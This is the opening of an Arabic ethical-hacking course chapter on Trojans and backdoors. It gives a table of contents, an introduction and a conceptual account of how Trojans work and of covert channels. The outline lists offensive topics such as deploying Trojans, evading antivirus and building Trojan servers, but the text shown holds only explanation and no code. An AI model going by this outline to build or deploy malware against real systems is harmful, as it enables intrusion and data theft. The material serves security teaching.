006 مكتبة رفوف كورس الهاكر الاخلاقي

6
‫اﻟﮭﺎﻛﺮ اﻷﺧﻼﻗﻲ‬
Trojans and Backdoors
By
Dr.Mohammed Sobhy Teba

Trojans and Backdoors
https://www.facebook.com/tibea2004
489
CONTENTS
493 .........................................................................................................................................................................................‫( ﻣﻘدﻣﮫ‬6.1)
493 .............. ................................................................................................................................ :‫ﻓﻲ ھذه اﻟوﺣدة ﺳوف ﻧﺗﺑﻊ اﻟﻧﻣط اﻟﺗﺎﻟﻲ‬
494 .............. ................................................................................................................................(Trojan Concepts) ‫( ﻣﻔﺎھﯾم اﻟﺗروﺟﺎن‬6.2)
494 . ................................................................................................‫(؟‬What is a Trojan) ‫ﻣﺎ ھو اﻟﺗروﺟﺎن او ﻣﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ ﺣﺻﺎن طروادة‬
495 ................ ................................ (Communication Paths: Overt And Covert Channels) ‫ اﻟﻘﻧوات اﻟﻌﻠﻧﯾﺔ واﻟﺳرﯾﺔ‬:‫ﻣﺳﺎر اﻻﺗﺻﺎﻻت‬
495 .............. ................................................................................................ (Purpose Of Trojans) ‫اﻟﻐرض ﻣن اﺳﺗﺧدام ﺣﺻﺎن طروادة‬
495 ............. ................................................................ ‫(؟‬What Do Trojan Creators Look For) ‫ﻣﺎ اﻟذي ﯾﻧﺗظره ﺻﺎﻧﻌوا ﺣﺻﺎن طروادة‬
496 ............................................................................................ Indications Of A Trojan Attack ‫اﻟﻣؤﺷرات ﻋﻠﻰ وﺟود ھﺟوم طروادة‬
497 ... ................................................................(Common Ports Used By Trojans) ‫أﻛﺛر اﻟﻣﻧﺎﻓذ ﺷﮭره اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ﺣﺻﺎن طروادة‬
498 ...... ................................................................................................................................................................Trojan Infection (6.3)
498 ......................................................... ‫(؟‬How To Infect Systems Using A Trojan) ‫ﻛﯾﻔﯾﺔ ﯾﺗم إﺻﺎﺑﺔ اﻷﻧظﻣﺔ ﻋن طرﯾﻖ ﺣﺻﺎن طروادة‬
499 ................... ................................................................................................................................................................ Wrappers
499 .................. ................................................................................................................................ Wrapper Covert Programs
502 ............................(Different Ways a Trojan Can Get Into a System) ‫اﻟطرق اﻟﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﻣﻛن ان ﯾﺣﺻل اﻟﺗروﺟﺎن اﻟوﺻول اﻟﻰ اﻟﻧظﺎم‬
505 ...................... ................................................................................................ (How To Deploy a Trojan) ‫ﻛﯾﻔﯾﺔ ﻧﺷر ﺣﺻﺎن طروادة‬
506 ............................................................................................. (Evading Antivirus Techniques) ‫اﻟﺗﮭرب ﻣن ﺗﻘﻧﯾﺎت ﻣﻛﺎﻓﺣﺔ اﻟﻔﯾروﺳﺎت‬
507 ................. ................................................................................................................................ (Type of Trojan) ‫( أﻧواع اﻟﺗروﺟﺎن‬6.3)
507 ...........................................................................................................................................................Command Shell Trojans
508 ........... ................................................................................................................................ Command Shell Trojan: Netcat
509 ................ ................................................................................................................................................................ GUI Trojan
509 ......................................................................................................................................................... Gui Trojan: MoSucker
510 ........ ................................................................................................................................ GUI Trojan: Jumper and Biodox
510 ..... ................................................................................................................................................................Document Trojans
511 ............ ................................................................................................................................................................Email Trojans
511 ............ ................................................................................................................................ Email Trojans: RemoteByMail
512 .. ................................................................................................................................................................ Defacement Trojans
513 ......... ................................................................................................................................ Defacement Trojans: Restorator
513 ........... ................................................................................................................................................................Botnet Trojans
514 .............. ................................................................................................ Botnet Trojan: Illusion Bot and NetBot Attacker
https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬

490
515 ................................................................................................................................................................Proxy Server Trojans
515 .................. ................................................................Proxy Server Trojans: W3bPrOxy Tr0j4nCr34t0r (Funny Name)
516 ............... ................................................................................................................................................................FTP Trojans
516 ........................................................................................................................................................FTP Trojan: TinyFTPD
516 ............. ................................................................................................................................................................ VNC Trojans
517 ......................................................................................................................... VNC Trojans: WinVNC and VNC Stealer
517 ............................................................................................................................................................. HTTP/HTTPS Trojans
518 .................. ................................................................................................................................ HTTP Trojan: HTTP RAT
519 ................. ................................................................................................................................ Shttpd Trojan - HTTPS (SSL)
519 ........ ................................................................................................................................................................ICMP Tunneling
520 .............................................................................................................................................................Remote Access Trojans
520 . ................................................................................................ Remote Access Trojan: Rat DarkComet and Apocalypse
521 ............... ................................................................................................................................ Covert Channel Trojan: CCTT
521 .... ................................................................................................................................................................E-Banking Trojans
522 ...................... ................................................................................................................................Banking Trojan Analysis
522 . ................................................................................................................................ E-Banking Trojan: ZeuS and SpyEye
523 ...... ................................................................................................................................Destructive Trojans: M4sT3r Trojan
523 .. ................................................................................................................................................................ Notification Trojans
524 . ................................................................................................................................................................ Credit Card Trojans
524 ............................................................................................................................. Data Hiding Trojans (Encrypted Trojans)
525 .. ................................................................................................................................................................ OS X Trojan: Crisis
525 ........... ................................................................................................................................MAC OS X Trojan: DNSChanger
526 ................. ................................................................................................................................Mac OS X Trojan: Hell Raiser
527 ......... ................................................................................................................................................................ Trojan Analysis
527 ........................................................................................................................................................ Trojan Analysis: Flame
529 ...................... ................................................................................................................................ Trojan Analysis: SpyEye
530 ................ ................................................................................................................................Trojan Analysis: ZeroAccess
533 ......................................................................................................................................................... Trojan Analysis: Duqu
535 ...................... ................................................................................................................................Trojan Types in Kali Linux
536 ......... ................................................................................................................................ ‫ اﻟﻛﺷف ﻋن اﻟﺗروﺟﺎن‬Trojan Detection (6.5)

491
536 .......... ................................................................................................ ‫(؟‬How To Detect Trojans) ‫ﻛﯾﻔﯾﺔ اﻟﻛﺷف ﻋن ﺣﺻﺎن طروادة‬
536 .......... ................................................................................................(Scanning For Suspicious Ports) ‫اﻟﺑﺣث ﻋن اﻟﻣﻧﺎﻓذ اﻟﻣﺷﺑوھﺔ‬
537 .............. ................................................................................................Port Monitoring Tools: TCPView and Currports
538 . ................................................................................................ (Scanning for Suspicious Processes) ‫اﻟﺑﺣث ﻋن اﻟﻌﻣﻠﯾﺎت اﻟﻣﺷﺑوھﺔ‬
541 ....... ................................................................ (Scanning for Suspicious Registry Entries) ‫ اﻟﻣﺷﺑوھﺔ‬Registry ‫اﻟﺑﺣث ﻋن إدﺧﺎﻻت‬
541 ............................................................................................................................. jvl6 PowerTools 2014 -Registry Cleaner
542 ......... ................................................................................................ Registry Entry Monitoring Tool: PC Tools Registry
542 ......... ................................................................................................................................Registry Entry Monitoring Tools
542 . ................................................................................................................................Scanning For Suspicious Device Drivers
543 .................... ................................................................................................ Device Drivers Monitoring Tool: DriverView
544 ......... ................................................................................................................................Device Drivers Monitoring Tools
544 ........................................................................................................................... Scanning For Suspicious Windows Services
545 ... ................................................................ Windows Services Monitoring Tool: Windows Service Manager (SrvMan)
545 ........................................................................................................................ Other Windows Services Monitoring Tools
546 ........................................................................................................................... Scanning For Suspicious Startup Programs
546 .... ................................................................................................................................ Windows8 Startup Registry Entries
546 ...................... ................................................................................................ Startup Programs Monitoring Tool: Starter
547 .... ................................................................................................Startup Programs Monitoring Tool: Security AutoRun
547 ........................................................................................................................ Other Startup Programs Monitoring Tools
548 ..............................................................................................................................Scanning for Suspicious Files and Folders
549 . ................................................................................................ Files and Folder Integrity Checker: FastSum and Winmd5
549 .................. ................................................................................................................................................................FastSum
550 .......... ................................................................................................................................Files and Folder Integrity Checker
550 ........................................................................................................................... Scanning for Suspicious Network Activities
550 .........................................................................................Detecting Trojans and Worms with Capsa Network Analyzer
551 .............................................................................................................................. Some Other Technique For Using Trojan (6.6)
551 ....... ................................................................................................................................Creating a Server Using the Theef
552 .... ................................................................................................................................ Creating a Server Using the Biodox
554 ...............................................................................................................................Creating a Server Using the MoSucker
555 .............................................................................................................................. Creating a Server Using the Metasploit

492
556 ................. ................................................................................................(Trojan Countermeasure) ‫( اﻟطرق اﻟﻣﺿﺎدة ﺿد اﻟﺗروﺟﺎن‬6.7)
556 ....................................................................................................................................................... Trojan Countermeasure
557 ................. ................................................................................................................................ Backdoor Countermeasures
557 ........... ................................................................................................................................ Trojan horse Construction Kits
557 ................. ................................................................................................(Anti-Trojan Software) ‫( اﻟﺗطﺑﯾﻘﺎت اﻟﻣﺿﺎدة ﺿد اﻟﺗروﺟﺎن‬6.8)
557 . ................................................................................................................................ Anti-Trojan Software: TrojanHunter
558 ................. ................................................................................................ Anti-Trojan Software: Emsisoft Anti-Malware
559 ............................................................................................................................................................Anti-Trojan Software
559 ................ ................................................................................................................................(Penetration test) ‫( ﻣﺧﺗﺑر اﻻﺧﺗراق‬6.9)
559 ............................................................................................................................ Pen Testing For Trojans and Backdoors

‫‪493‬‬
‫)‪ (6.1‬ﻣﻘﺪﻣﮫ‬
‫اﻟﮭدف اﻟرﺋﯾﺳﻲ ﻣن ھذه اﻟوﺣدة ھو أن ﻧﻘدم ﻟك ﻣﻌرﻓﺔ اﻷﻧواع اﻟﻣﺧﺗﻠﻔﺔ ﻣن اﻟﺗروﺟﺎن او ﻣﺎ ﯾطﻠﻖ ﻋﻠﯾﮭﺎ اﺣﺻﻧﺔ طروادة و‪،Backdoor‬‬
‫واﻟطرﯾﻘﺔ اﻟﺗﻲ اﻧﺗﺷرت ﺑﮭﺎ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت‪ ،‬وأﻋراض ھذه اﻟﮭﺟﻣﺎت‪ ،‬ﻋواﻗب ھﺟﻣﺎت ﺣﺻﺎن طروادة‪ ،‬واﻟطرق اﻟﻣﺧﺗﻠﻔﺔ ﻟﺣﻣﺎﯾﺔ ﻣوارد‬
‫اﻟﺷﺑﻛﺔ أو اﻟﻧظﺎم ﻣن أﺣﺻﻧﺔ طروادة و‪ .Backdoor‬ﺗﺻف ھذه اﻟوﺣدة أﯾﺿﺎ اﻟﻌﻣﻠﯾﺔ اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ ﻣﺧﺗﺑر اﻻﺧﺗراق ﻟﺗﻌزﯾز اﻷﻣن ﺿد‬
‫أﺣﺻﻧﺔ طروادة و‪.Backdoor‬‬
‫ھذه اﻟوﺣدة ﺗﺟﻌﻠك ﺗﺗﻌرف ﻋﻠﻰ اﻻﺗﻲ‪:‬‬
‫‪ -‬ﻣﺎ ھو ﺣﺻﺎن طروادة؟‬
‫‪ -‬أﻧواع أﺣﺻﻧﺔ طروادة‬
‫‪ -‬ﻣﺎ اﻟذي ﻛﺎن ﯾﺑﺣث ﻋﻧﮫ ﺻﺎﻧﻊ ﺣﺻﺎن طروادة؟‬
‫‪ -‬ﺗﺣﻠﯾل ﺣﺻﺎن طروادة‬
‫‪ -‬اﻟﻣؤﺷرات ﻋﻠﻰ وﺟود ھﺟوم ﺣﺻﺎن طروادة‬
‫‪ -‬ﻛﯾﻔﯾﺔ اﻟﻛﺷف ﻋن ﺣﺻﺎن طروادة‬
‫‪ -‬اﻟﻣﻧﺎﻓذ اﻟﻣﺷﮭورة اﻟﻣﺳﺗﺧدﻣﺔ ﻣن ﻗﺑل ﺣﺻﺎن طروادة‬
‫‪ -‬اﻟﺗداﺑﯾر اﻟﻣﺿﺎدة ﺿد ﺣﺻﺎن طروادة‬
‫‪ -‬ﻛﯾﻔﻲ ﯾﺻﺎب اﻷﻧظﻣﺔ ﻋن طرﯾﻖ ﺣﺻﺎن طروادة؟‬
‫‪ -‬أدوات إﻧﺷﺎء ﺣﺻﺎن طروادة‬
‫‪ -‬اﻟطرق ﻣﺧﺗﻠﻔﺔ اﻟﺗﻲ ﯾﺗﻣﻛن ﻓﯾﮭﺎ ﺣﺻﺎن طروادة ﻣن اﻟوﺻول اﻟﻰ اﻟﻧظﺎم‬
‫‪ -‬ﺑراﻣﺞ ﻣﻛﺎﻓﺣﺔ ﺣﺻﺎن طروادة‬
‫‪ -‬ﻋﻣﻠﯾﺔ اﺧﺗﺑﺎر اﻻﺧﺗراق ﺿد أﺣﺻﻧﺔ طروادة و ‪Backdoor‬‬
‫‪ -‬ﻛﯾﻔﯾﺔ ﻧﺷر ﺣﺻﺎن طروادة‬
‫ﻓﻲ ھذه اﻟوﺣدة ﺳوف ﻧﺗﺑﻊ اﻟﻧﻣط اﻟﺗﺎﻟﻲ‪:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬

‫‪494‬‬
‫)‪ (6.2‬ﻣﻔﺎھﯿﻢ اﻟﺘﺮوﺟﺎن )‪(TROJAN CONCEPTS‬‬
‫ﻟﻔﮭم اﻟﺗروﺟﺎن واﻟﺑﺎك دور )‪ (backdoor‬وﺗﺄﺛﯾرھﻣﺎ ﻋﻠﻰ ﻣوارد اﻟﺷﺑﻛﺔ واﻟﻧظﺎم‪ ،‬دﻋوﻧﺎ ﻧﺑدأ أوﻻ ﻣﻊ اﻟﻣﻔﺎھﯾم اﻷﺳﺎﺳﯾﺔ ﻟﻠﺗروﺟﺎن‪ .‬ﯾﺻف ھذا‬
‫اﻟﻘﺳم اﻟﺗروﺟﺎن وﯾﺳﻠط اﻟﺿوء ﺧﺎﺻﺔ ﻋﻠﻰ اﻟﻐرض ﻣن اﺳﺗﺧدام اﻟﺗروﺟﺎن‪ ،‬أﻋراض ھﺟﻣﺎت اﻟﺗروﺟﺎن‪ ،‬واﻟﻣﻧﺎﻓذ اﻷﻛﺛر ﺷﮭره اﻟﻣﺳﺗﺧدﻣﺔ ﻣن‬
‫ﻗﺑل اﻟﺗروﺟﺎن‪.‬‬
‫ﻣﺎ ھو اﻟﺗروﺟﺎن او ﻣﺎ ﯾطﻠﻖ ﻋﻠﯾﮫ ﺣﺻﺎن طروادة )‪(What is a Trojan‬؟‬

‫وﻓﻘﺎ ﻟﻸﺳﺎطﯾر اﻟﯾوﻧﺎﻧﯾﺔ‪ ،‬أن ﺣﺻﺎر اﻹﻏرﯾﻖ ﻟطروادة دام ﻋﺷر ﺳﻧوات‪ ،‬ﻓﺎﺑﺗدع اﻹﻏرﯾﻖ ﺣﯾﻠﺔ ﺟدﯾدة‪ ،‬ﺣﺻﺎﻧﺎ ً ﺧﺷﺑﯾﺎ ً ﺿﺧﻣﺎ ً أﺟوﻓﺎ ﺑﻧﺎه إﺑﯾوس‬
‫وﻣﻠﺊ ﺑﺎﻟﻣﺣﺎرﺑﯾن اﻹﻏرﯾﻖ ﺑﻘﯾﺎدة أودﯾﺳﯾوس‪ ،‬أﻣﺎ ﺑﻘﯾﺔ اﻟﺟﯾش ﻓظﮭر ﻛﺄﻧﮫ رﺣل ﺑﯾﻧﻣﺎ ﻓﻲ اﻟواﻗﻊ ﻛﺎن ﯾﺧﺗﺑﺊ وراء ﺗﯾﻧدوس‪ ،‬وﻗﺑل اﻟطروادﯾون‬
‫اﻟﺣﺻﺎن ﻋﻠﻰ أﻧﮫ ﻋرض ﺳﻼم‪ .‬وﻗﺎم ﺟﺎﺳوس إﻏرﯾﻘﻲ‪ ،‬اﺳﻣﮫ ﺳﯾﻧون‪ ،‬ﺑﺈﻗﻧﺎع اﻟطروادﯾﯾن ﺑﺄن اﻟﺣﺻﺎن ھدﯾﺔ‪ ،‬ﺑﺎﻟرﻏم ﻣن ﺗﺣذﯾرات ﻻﻛون‬
‫وﻛﺎﺳﺎﻧدرا‪ ،‬ﺣﺗﻰ أن ھﯾﻠﯾن ودﯾﻔوﺑوس ﻓﺣﺻﺎ اﻟﺣﺻﺎن ﻓﺄﻣر اﻟﻣﻠك ﺑﺈدﺧﺎﻟﮫ إﻟﻰ اﻟﻣدﯾﻧﺔ ﻓﻲ اﺣﺗﻔﺎل ﻛﺑﯾر‪ .‬اﺣﺗﻔل اﻟطروادﯾون ﺑرﻓﻊ اﻟﺣﺻﺎر‬
‫واﺑﺗﮭﺟوا‪ ،‬وﻋﻧدﻣﺎ ﺧرج اﻹﻏرﯾﻖ ﻣن اﻟﺣﺻﺎن داﺧل اﻟﻣدﯾﻧﺔ ﻓﻲ اﻟﻠﯾل‪ ،‬ﻛﺎن اﻟﺳﻛﺎن ﻓﻲ ﺣﺎﻟﺔ ﺳﻛر‪ ،‬ﻓﻔﺗﺢ اﻟﻣﺣﺎرﺑون اﻹﻏرﯾﻖ ﺑواﺑﺎت اﻟﻣدﯾﻧﺔ‬
‫ﻟﻠﺳﻣﺎح ﻟﺑﻘﯾﺔ اﻟﺟﯾش ﺑدﺧوﻟﮭﺎ‪ ،‬ﻓﻧﮭﺑت اﻟﻣدﯾﻧﺔ ﺑﻼ رﺣﻣﺔ‪ ،‬وﻗﺗل ﻛل اﻟرﺟﺎل‪ ،‬وأﺧذ ﻛل اﻟﻧﺳﺎء واﻷطﻔﺎل ﻛﻌﺑﯾد‪.‬‬
‫ﻋﻧد اﻟﻧظر اﻟﻰ اﻻﺳﺎطﯾر اﻟﯾوﻧﺎﻧﯾﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﺗم ﺗﻌرﯾف طروادة ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻛﻣﺑﯾوﺗر ك " ﺷﻔرة ﺻﻐﯾرة او ﺑرﻧﺎﻣﺞ ﯾﺗم ﺗﺣﻣﯾﻠﮫ ﻣﻊ ﺑرﻧﺎﻣﺞ رﺋﯾﺳﻲ ﻣن‬
‫اﻟﺑراﻣﺞ ذات اﻟﺷﻌﺑﯾﺔ اﻟﻌﺎﻟﯾﺔ‪ ،‬وﯾﻘوم ﺑﺑﻌض اﻟﻣﮭﺎم اﻟﺧﻔﯾﺔ‪ ،‬ﻏﺎﻟﺑﺎ ً ﻣﺎ ﺗﺗرﻛز ﻋﻠﻰ إﺿﻌﺎف ﻗوى اﻟدﻓﺎع ﻟدى اﻟﺿﺣﯾﺔ أو اﺧﺗراق ﺟﮭﺎزه وﺳرﻗﺔ‬
‫ﺑﯾﺎﻧﺎﺗﮫ"‪ .‬ﯾﺳﺗﺧدم ﺣﺻﺎن طروادة )اﻟﺣﺎﺳوب( ﻓﻲ اﻟدﺧول اﻟﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﺑطرﯾﻘﮫ ﻻ ﯾﺗم ﻛﺷﻔﮭﺎ‪ ،‬ﻣﻧﺢ اﻟﻣﮭﺎﺟم اﻟوﺻول ﻏﯾر اﻟﻣﻘﯾد‬
‫إﻟﻰ اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧزﻧﺔ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر واﻟﺗﺳﺑب ﻓﻲ أﺿرار ھﺎﺋﻠﺔ واﻟﺗﻲ ﯾﺗم إﻟﺣﺎﻗﮭﺎ ﺑﺎﻟﺿﺣﯾﺔ‪ .‬ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻋﻧدﻣﺎ ﯾﻘوم اﻟﻣﺳﺗﺧدم ﺑﺗﺣﻣﯾل‬
‫ﻋﻠﻰ ﻣﺎ ﯾﺑدو أﻧﮫ ﻣﻠف ﻓﯾﻠم أو ﻣوﺳﯾﻘﺎ‪ ،‬وﻟﻛن ﻋﻧدﻣﺎ ﯾﻘوم ﺑﺗﺷﻐﯾل ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾطﻠﻖ اﻟﻌﻧﺎن ﻟﺑرﻧﺎﻣﺞ ﺧطﯾر واﻟﺗﻲ ﻣن اﻟﻣﻣﻛن أن ﯾﻣﺣو اﻟﻘرص‬
‫اﻟﺻﻠب اﻟﺧﺎص ﺑﺎﻟﻣﺳﺗﺧدم وإرﺳﺎل أرﻗﺎم ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن وﻛﻠﻣﺎت اﻟﺳر ﻟﺷﺧص ﻏرﯾب‪ .‬ﺣﺻﺎن طروادة ﯾﻣﻛن أﯾﺿﺎ أن ﯾﻛون ﻣدﻣﺞ ﻓﻲ‬
‫ﺑرﻧﺎﻣﺞ ﻣﺷروﻋﺔ )ﻗد ﺗﻛون ذات ﺷﻌﺑﯾﮫ ﻋﺎﻟﯾﺔ أﯾﺿﺎ(‪ ،‬وھذا ﯾﻌﻧﻲ أن ھذا اﻟﺑرﻧﺎﻣﺞ ﻗد ﯾﻛون ﻟﮫ وظﯾﻔﺔ ﺧﻔﯾﺔ واﻟﺗﻲ ﻓﯾﮭﺎ ﯾﻛون اﻟﻣﺳﺗﺧدم ﻋﻠﻰ ﻋﻠم‬
‫ﺑﮭﺎ‪ .‬ﻓﻲ ﺳﯾﻧﺎرﯾو آﺧر‪ ،‬ﺟﮭﺎز اﻟﺿﺣﯾﺔ ﻣن اﻟﻣﻣﻛن أﯾﺿﺎ أن ﯾﺳﺗﺧدم ﻛوﺳﯾط ﻟﻣﮭﺎﺟﻣﺔ اﻵﺧرﯾن دون ﻣﻌرﻓﺗﮫ ﺑذﻟك‪ .‬اﻟﻣﮭﺎﺟﻣون ﯾﻣﻛﻧﮭم اﺳﺗﺧدام‬
‫ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﻻرﺗﻛﺎب ھﺟوم اﻟﺣرﻣﺎن ﻣن اﻟﺧدﻣﺔ )‪ (denial-of-service‬اﻟﻐﯾر ﻣﺷروﻋﮫ ﻣﺛل ﺗﻠك اﻟﺗﻲ ﺷﻠت ﺗﻘرﯾﺑﺎ ﺷﺑﻛﺔ‬
‫‪ DALnet IRC‬ﻟﻌدة أﺷﮭر ﻓﻲ اﻟﻧﮭﺎﯾﺔ‪.‬‬
‫)‪ DALnet‬ھو ﺷﺑﻛﺔ اﻟدردﺷﺔ ﻋﻠﻰ اﻹﻧﺗرﻧت)‪ Internet relay chat (IRC‬اﻟﺗﻲ ھﻲ ﺷﻛل ﻣن أﺷﻛﺎل اﻻﺗﺻﺎﻻت اﻟﻔورﯾﺔ ﻋﺑر اﻟﺷﺑﻛﺔ(‬
‫اﻟﺗروﺟﺎن‪/‬ﺣﺻﺎن طروادة ﯾﻌﻣل ﻓﻲ ﻧﻔس اﻟﻣﺳﺗوى ﻣن اﻻﻣﺗﯾﺎزات اﻟﺗﻲ ﯾﺳﺗﺧدﻣﮭﺎ اﻟﺿﺣﯾﺔ‪ .‬إذا ﻛﺎن اﻟﺿﺣﯾﺔ ﯾﻣﻠك اﻣﺗﯾﺎزات‪ ،‬ﻓﺄذن اﻟﺗروﺟﺎن‬
‫ﯾﻣﻛﻧﮫ ﺣذف اﻟﻣﻠﻔﺎت‪ ،‬ﻧﻘل اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﺗﻌدﯾل اﻟﻣﻠﻔﺎت اﻟﻣوﺟودة‪ ،‬وﺗﺛﺑﯾت ﺑراﻣﺞ أﺧرى )ﻣﺛل اﻟﺑراﻣﺞ اﻟﺗﻲ ﺗوﻓر اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ اﻟﻐﯾر‬
‫ﻣﺻرح ﺑﮫ وﺗﻧﻔﯾذ ھﺟﻣﺎت رﻓﻊ اﻻﻣﺗﯾﺎزات(‪ .‬اﻟﺗروﺟﺎن‪/‬ﺣﺻﺎن طروادة ﯾﻣﻛن ﻣﺣﺎوﻟﺔ اﺳﺗﻐﻼل ﺛﻐرة ﻣﺎ ﻟزﯾﺎدة ﻣﺳﺗوى اﻟوﺻول أﻛﺑر ﻣن ذﻟك‬
‫اﻟذي ﯾﻣﻠﻛﮫ اﻟﻣﺳﺗﺧدم اﻟذي ﻗﺎم ﺑﺗﺷﻐﯾل ﺣﺻﺎن طروادة‪ .‬إذا ﺗم اﻟﻧﺟﺎح‪ ،‬ﻓﺎن ﺣﺻﺎن طروادة ﯾﻣﻛﻧﮫ اﻟﻌﻣل ﻋﻠﻰ زﯾﺎدة اﻻﻣﺗﯾﺎزات ورﺑﻣﺎ ﺗﺛﺑﯾت‬
‫ﺑﻌض اﻷﻛواد اﻟﺧﺑﯾﺛﺔ اﻷﺧرى ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬
‫اﺧﺗراق أي ﻧظﺎم ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﻗد ﯾؤﺛر ﻋﻠﻰ اﻷﻧظﻣﺔ اﻷﺧرى ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ .‬اﻷﻧظﻣﺔ اﻟﺗﻲ ﺗﺣﯾل أوراق اﻋﺗﻣﺎد اﻟﻣﺻﺎدﻗﺔ ﻣﺛل ﻛﻠﻣﺎت اﻟﻣرور‬
‫ﻋﺑر اﻟﺷﺑﻛﺎت اﻟﻣﺷﺗرﻛﺔ ﻓﻲ ﻧص واﺿﺢ )‪ (clear text‬أو ﻓﻲ ﺷﻛل ﻣﺷﻔرة ﻣﻌرﺿﺔ ﺑﺷﻛل ﺧﺎص ﻟﻼﺧﺗراق‪ .‬إذا ﺗم اﺧﺗراق اﻟﻧظﺎم ﻋﻠﻰ ﻣﺛل‬
‫ھذه اﻟﺷﺑﻛﺔ‪ ،‬ﻗد ﯾﻛون اﻟدﺧﯾل ﻗﺎدرا ﻋﻠﻰ ﺗﺳﺟﯾل أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور أو ﻏﯾرھﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪.‬‬
‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﺣﺻﺎن طروادة‪ ،‬ﯾﺗوﻗف ﻋﻠﻰ اﻹﺟراءات اﻟﺗﻲ ﯾﻧﻔذھﺎ‪ ،‬ﺑﺣﯾث ﻗد ﯾورط ﻧظﺎم ﺑﻌﯾد ﻛﻣﺻدر ﻟﺷن اﻟﮭﺟوم زورا وذﻟك‬
‫ﺑﺎﻟﺗﺣﺎﯾل)‪ ،(spoofing‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﺗﺳﺑب ﻟﻠﻧظﺎم اﻟﺑﻌﯾد ﺗﺣﻣل اﻻﻟﺗزاﻣﺎت‪.‬‬

‫‪495‬‬
‫ﻣﺳﺎر اﻻﺗﺻﺎﻻت‪ :‬اﻟﻘﻧوات اﻟﻌﻠﻧﯾﺔ واﻟﺳرﯾﺔ )‪(Communication Paths: Overt And Covert Channels‬‬
‫‪ Overt‬ﺗﻌﻧﻰ واﺿﺢ او ﻋﻠﻧﻲ ‪ ،‬ﻓﻲ ﺣﯾن أن ‪ Covert‬ﺗﻌﻧﻰ ﺳرى أو ﺧﻔﻲ‪ .‬اﻟﻘﻧﺎة اﻟﻌﻠﻧﯾﺔ ھﻲ‪ ،‬ﻗﻧﺎة ﻗﺎﻧوﻧﯾﮫ آﻣﻧﮫ ﻟﻧﻘل اﻟﺑﯾﺎﻧﺎت أو اﻟﻣﻌﻠوﻣﺎت‬
‫ﺿﻣن ﺷﺑﻛﺔ اﻟﺷرﻛﺔ‪ .‬ھذه اﻟﻘﻧﺎة ھﻲ ﺿﻣن ﺑﯾﺋﺔ آﻣﻧﺔ ﻟﻠﺷرﻛﺔ وﺗﻌﻣل ﺑﺷﻛل آﻣن ﻟﻧﻘل اﻟﺑﯾﺎﻧﺎت واﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫ﻓﻲ ﺣﯾن ﻋﻠﻰ اﻟﺟﺎﻧب اﻻﺧر‪ ،‬اﻟﻘﻧﺎة اﻟﺳرﯾﺔ ھﻲ‪ ،‬اﻟﻣﺳﺎر اﻟﺧﻔﻲ اﻟﻐﯾر ﺷرﻋﻲ واﻟﺗﻲ ﺗﺳﺗﺧدم ﻓﻲ ﻧﻘل اﻟﺑﯾﺎﻧﺎت ﻣن اﻟﺷﺑﻛﺔ‪ .‬اﻟﻘﻧوات اﻟﺳرﯾﺔ ھﻲ‬
‫اﻟطرق اﻟﺗﻲ ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺑروﺗوﻛول ﻏﯾر ﻗﺎﺑل ﻟﻠﻛﺷف‪ .‬ﻓﮭﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ﺗﻘﻧﯾﺔ ﺗﺳﻣﻰ اﻟﻧﻔﻖ)‪ ،(Tunnel‬واﻟذي ﯾﺳﻣﺢ‬
‫ﻟﺑروﺗوﻛول واﺣد أن ﯾﺗم ﺗرﺣﯾﻠﮫ ﻋﻠﻰ ﺑروﺗوﻛول آﺧر‪ .‬ﻋﻣوﻣﺎ ﻻ ﺗﺳﺗﺧدم اﻟﻘﻧوات ﺳرﯾﺔ ﻟﺗﺑﺎدل اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﻟذﻟك ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ ﺑواﺳطﺔ‬
‫اﺳﺗﺧدام أﺳﺎﻟﯾب أﻣن اﻟﻧظﺎم اﻟﻘﯾﺎﺳﯾﺔ‪ .‬أي ﻋﻣﻠﯾﺔ أو ﺑت ﻣن اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛن أن ﯾﻛون اﻟﻘﻧﺎة اﻟﺳرﯾﺔ‪ .‬ھذا ﯾﺟﻌﻠﮭﺎ ﻓﻲ اﻟوﺿﻊ ‪Attractive mode‬‬
‫ﻟﻧﻘل ﺣﺻﺎن طروادة‪ ،‬ﺣﯾث ﯾﻣﻛن أن ﯾﺳﺗﺧدم اﻟﻣﮭﺎﺟم اﻟﻘﻧﺎة اﻟﺳرﯾﺔ ﻟﺗﺛﺑﯾت ‪ Backdoor‬ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪.‬‬
